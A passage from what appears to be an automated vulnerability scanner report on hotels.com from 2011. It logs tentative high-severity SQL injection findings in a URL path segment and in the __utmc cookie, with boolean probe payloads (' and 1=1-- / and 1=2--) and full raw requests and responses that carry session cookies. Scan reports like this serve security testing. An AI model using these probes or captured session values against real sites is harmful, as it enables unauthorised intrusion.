Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:32 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html'%20and%201%3d1--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43425
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

Request 2

GET /hotel/details.html'%20and%201%3d2--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43617
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:48 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
